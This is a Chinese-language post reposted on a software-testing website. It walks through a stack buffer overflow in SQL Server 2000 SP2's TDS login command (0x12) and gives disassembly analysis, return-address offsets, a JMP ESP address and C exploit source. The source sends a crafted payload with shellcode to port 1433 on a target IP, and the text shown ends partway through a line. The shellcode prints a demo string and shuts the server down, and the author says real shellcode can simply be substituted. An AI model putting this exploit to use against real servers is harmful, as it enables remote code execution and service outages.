• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

SQL SERVER 2000 SP2 12命令的溢出攻击实现

发布: 2007-6-21 12:06 | 作者:   | 来源:   | 查看: 23次 | 进入软件测试论坛讨论

领测软件测试网

   
  这几天开始用汇编看sql server的代码,发现SQL SERVER的1433 TDS协议中,0X12号命令(请求验证)存在一个溢出问题,在传送最后的MSSQLSERVER后面跟上572个以上的字节会导致溢出,心里一喜,但吸取上次教训,一查,发现8月12这个漏洞已经被公告。哎

  但是一看,公告代码只指出溢出,但是未实现溢出,仔细一看,要实现这个溢出还是很麻烦的,涉及到很多问题:
  
  下面是汇编代码分析:
  前面接受信息的大致流程:
  请求
  text:004DE099 call sub_410E22
  .text:00410ED3 call dword ptr [eax+14h]
  调用s.netlib的获取异步socket到来的信息
  42CF42F2:连接并接收信息
  .text:00410ED6 add esp, 18h
  
  处理数据:
  42cf719e处调用,下个返回地址应该是42cf71a3,溢出就是要覆盖这个返回地址
  溢出产生在:42cf72cf处的strcpy上
  但是其中问题存在于:strcpy拷贝的地址离42cf71a3的地址有572个字节,其中存在很多其他变量的指针,如果随便覆盖掉的话,在这个子过程中会继续引用他们,那么就引起访问违例,直接被异常给捕获了,而无法达到执行代码的目的,而其其过程是一个循环执行过程,会导致很复杂的计算。
  涉及到的需要继续引用覆盖地址值的代码有:
  .text:42CF73D9 mov edx, [ebp+var_4]
  .text:42CF73DC add edx, 5
  .text:42CF73DF mov [ebp+var_4], edx
  .text:42CF7263 mov edx, [ebp+arg_4]
  .text:42CF7266 add edx, [ebp+var_4]
  .text:42CF7269 xor eax, eax
  .text:42CF726B mov al, [edx]
  .text:42CF726D mov [ebp+var_14], eax
  .text:42CF7270 mov ecx, [ebp+arg_4]
  .text:42CF7320 mov [ebp+var_224], ecx
  .text:42CF7326 mov edx, [ebp+arg_0]
  .text:42CF7329 mov eax, [ebp+var_224]
  .text:42CF732F mov ecx, [eax]
  
  可以发现以上值主要是涉及到
  要覆盖地址-8
  要覆盖地址+4
  要覆盖地址+8
  要覆盖地址+C
  要覆盖地址+10
  要覆盖地址+14
  这几个地址上,而且主要是写操作
  并且要覆盖地址-4会和要覆盖地址+4会进行一次加操作,其操作的地址范围也应该为可读写。
  因此很容易想到,用SQL SERVER固定分配的某个数据区的地址取带该区就不会引起异常了。而要覆盖地址-4最好为0xffffffff左右的值,其他地址加上这个值也在一个数据区范围以内,问题就不大要覆盖地址+4,要覆盖地址+8,要覆盖地址+C,要覆盖地址+10,要覆盖地址+14的值要仔细选取,因为JMP ESP跳回来以后正好在从要覆盖地址+4处开始执行,需要其汇编代码不能引起异常和跳转到其他地方去,否则就无法执行我们真正能实现的shellcode了。
  另外就是如果shellcode全部放在要覆盖地址+18后执行也有问题,其中可能在同一个过程中会用到其中的值,因此把shellcode最好放在前面,在覆盖地址+18后用少量的代码跳转回去,避免大量覆盖引起异常。
  另外就是jmp esp代码的选择,其实不同服务器版本地址不同,但是我想在SQL SERVER代码本身中找更好。只要存在一个ffe4数字就可,不管是不是真的jmp esp代码,这样shellcode可以更简单,也更通用一些,仔细一看,sql server中还真有这个组合,位置在42B0C9DC处。OK,那么主要问题就搞定了
  我的环境是:sql server 2000+sp2+最新的补掉sql server udp漏洞的q36几几的。
  下面是演示代码,其中没有实现真正的shellcode,而是实现了打印了一行sql hack demo,并且当掉了SQL SERVER服务器,其实只要把其中代码置换成shellcode就可以了,当然需要考虑大小问题,如果放在后面可以不考虑大小,但是可能会引起一些异常,我没仔细调试,放在前面许可的长度大概有500多字节左右,做SHELLCODE也应该足够了。
  大家在cmd下运行sqlsvrer可以看到打印出的sql hack demo字符,并且SQL 当掉,如果是服务或管理工具启动,则无法打印sql hack demo,但SQL会当掉,注意此处当掉不是因为异常,而是执行了shellcode的exit导致的。
  #include
  #include
  #include
  #include
  #include
  #include
  
  int main(int argc, char* argv[])
  {
  WSADATA WSAData;
  SOCKET sock;
  SOCKADDR_IN addr_in;
  unsigned char buf0[48+572]={
  0x12,1,0,0x34,0,0,0,0,0,0,0x15,0,6,1,0,0x1b,
  0,1,2,0,0x1c,0,0xc,3,0,0x28,0,4,0xff,8,0,2,
  0x10,0,0,0,0x4d,0x53,0x53,0x51,0x4c,0x53,0x65,0x72,0x76,0x65,0x72,1,0x10,4,1,1};
  
  unsigned char buf1[255]={10,9,8,7,6,5,4,3,2,1,0};
  char exploit_code[21]= "\x83\xc4\x81\x8b\xc4\x50\xff\x15\xf8\xe0\xcf\x42"
  "\x33\xc0\x50\xff\x15\x84\xe0\xcf\x42";
  //这个是打印"sql hack demo"并退出sql server的shellcode代码
  int i;
  int len;
  const int SNDBUF = 0;
  const int TCPNODELAY = TRUE;
  const int BROADCAST = TRUE;
  int fo=572; //需要覆盖的返回地址偏移处
  if (argc<2)
  {
  return FALSE;
  }
  for(i=0x34;i<584;i++)
  buf0[i]=0x90;
  //示范打印的字符串
  buf0[0x34+0x10]=''s'';
  buf0[0x34+0x11]=''q'';
  buf0[0x34+0x12]=''l'';
  buf0[0x34+0x13]='' '';
  buf0[0x34+0x14]=''h'';
  buf0[0x34+0x15]=''a'';
  buf0[0x34+0x16]=''c'';
  buf0[0x34+0x17]=''k'';
  buf0[0x34+0x18]='' '';
  buf0[0x34+0x19]=''d'';
  buf0[0x34+0x1a]=''e'';
  buf0[0x34+0x1b]=''m'';
  buf0[0x34+0x1c]=''o'';
  buf0[0x34+0x1d]=''\n'';
  
  //防止数据改动引起异常而退出而无法实现有效溢出,因此进行有效修改
  buf0[fo-0x8]=0xff;
  buf0[fo-0x7]=0xff;
  buf0[fo-0x6]=0xff;
  buf0[fo-0x5]=0xff;
  //42D01CFC 为SQL SERVER固定的数据区域,且其汇编代码不引起问题
  buf0[fo+4]=0xfc;
  buf0[fo+5]=0x1c;
  buf0[fo+6]=0xd0;
  buf0[fo+7]=0x42;
  //42d01c72 为固定的数据区域才能可写
  buf0[fo+8]=0x64;
  buf0[fo+9]=0x0d;
  buf0[fo+0xa]=0xd0;
  buf0[fo+0xb]=0x42;
  //42D01CFC 为固定的数据区域才能可写
  buf0[fo+0xc]=0xfc;
  buf0[fo+0xd]=0x1c;
  buf0[fo+0xe]=0xd0;
  buf0[fo+0xf]=0x42;
  //42d01c72 为固定的数据区域才能可写
  buf0[fo+0x10]=0x64;
  buf0[fo+0x11]=0x0d;
  buf0[fo+0x12]=0xd0;
  buf0[fo+0x13]=0x42;
  //42d01c72 为固定的数据区域才能可写
  buf0[fo+0x14]=0x64;
  buf0[fo+0x15]=0x0d;
  buf0[fo+0x16]=0xd0;
  buf0[fo+0x17]=0x42;
  //在溢出了返回地址后,由于其中的N个代码需要返回后跳转、而此处由在子函数中需要处理,因此寻找一个数据地址放入,同时使得其汇编代码不引起访问异常。
  
  //然后下面的几个地址是在此过程中不需要使用的,因此可以大胆修改成我们需要的汇编代码了
  //写入跳回去的代码buf0[fo+0xc]=0x42;
  buf0[fo+0x18]=0x81;
  //ADD ESP,0XFFFFFF92
  buf0[fo+0x19]=0x83;
  buf0[fo+0x1a]=0xc4;
  buf0[fo+0x1b]=0x81;
  //ADD ESP,0XFFFFFF92
  buf0[fo+0x1C]=0x83;
  buf0[fo+0x1D]=0xc4;
  buf0[fo+0x1E]=0x81;
  //ADD ESP,0XFFFFFF92
  buf0[fo+0x1f]=0x83;
  buf0[fo+0x20]=0xc4;
  buf0[fo+0x21]=0x81;
  //JMP ESP
  buf0[fo+0x22]=0xff;
  buf0[fo+0x23]=0xe4;
  //以上代码在溢出返回后执行,由于主要的shellcode防在前面,需要跳转回去
  //不直接放在后面的原因在于:覆盖了后面的一些变量,会导致提前出现地址访问异常,导致无法达到执行我们想要代码的目的
  
  memcpy(buf0+fo-8-364,exploit_code,21);
  //拷贝SHELLCODE
  
  //FFE4=JMP ESP
  //设置溢出地址的值,42B0C9DC是SQL SERVER本身代码有的FFE4地方
  buf0[fo]=0xDC;
  buf0[fo+1]=0xC9;
  buf0[fo+2]=0xB0;
  buf0[fo+3]=0x42;
  //需要找到JMP ESP的代码,然而这个是随版本变化的,所以干脆在SQL SERVER程序中找,只要组合成这个就可
  
  if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  {
  printf("WSAStartup error.Error:%d\n",WSAGetLastError());
  return FALSE;
  }
  if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  {
  printf("Socket failed.Error:%d\n",WSAGetLastError());
  return FALSE;
  }
  
  addr_in.sin_family=AF_INET;
  addr_in.sin_port=htons(1433);
  addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
  buf0[1]=1;
  if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
  {
  printf("Connect failed.Error:%d",WSAGetLastError());
  return FALSE;
  }
  if (send(sock, buf0, sizeof(buf0), 0)==SOCKET_ERROR)
  {
  printf("Send failed.Error:%d\n",WSAGetLastError());
  return FALSE;
  }
  
  len=recv(so

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网